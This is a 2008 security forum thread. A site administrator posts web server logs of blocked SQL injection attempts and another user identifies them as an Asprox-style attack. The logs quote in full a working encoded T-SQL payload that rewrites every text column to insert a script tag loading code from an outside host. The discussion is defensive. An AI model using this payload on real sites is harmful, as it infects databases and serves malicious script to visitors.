SQL Injection attempts on our website

Networking/Security Forums -> Databases

Author: MotivLocation: Seattle, WA PostPosted: Thu Jun 05, 2008 3:07 pm    Post subject: SQL Injection attempts on our website
    ----
From the logs today:

2008-06-05 06:41:37 x.x.x.x GET /detail.aspx ID=5194;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 854 296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5194';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 3296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 0 1744 854 281
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 249


What do you all make of this? I don't think it was successful - The http return code was 403 forbidden. I've been through the database and code on our pages making sure no yay fun scripts were being called from CommieVille.

Author: GroovicusLocation: Centerville, South Dakota PostPosted: Thu Jun 05, 2008 3:32 pm    Post subject:
    ----
Somebody tried to run a script to inject malicious javascript onto your database. I am guessing that it is an Asprox variant.

http://www.bandnut.com/forum/forum_posts.asp?TID=19080

Author: MotivLocation: Seattle, WA PostPosted: Thu Jun 05, 2008 3:40 pm    Post subject:
    ----
How can I make sure it wasn't successful?

I read over the post on the link you provided and found none of those malicious files on the web server.

Which table in the database should I be looking at? looks like a table named cursor if I am reading right?

Author: GroovicusLocation: Centerville, South Dakota PostPosted: Thu Jun 05, 2008 3:51 pm    Post subject:
    ----
If the return code was a 403 error, then the attack was not successful. Are any of your webpages showing javascript that does not belong? I do not use asp or Microsoft SQL, so I don't know all that much about it, but there are quite a few pages that discuss it in depth. Perhaps one of them has detection measures.



Networking/Security Forums -> Databases


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group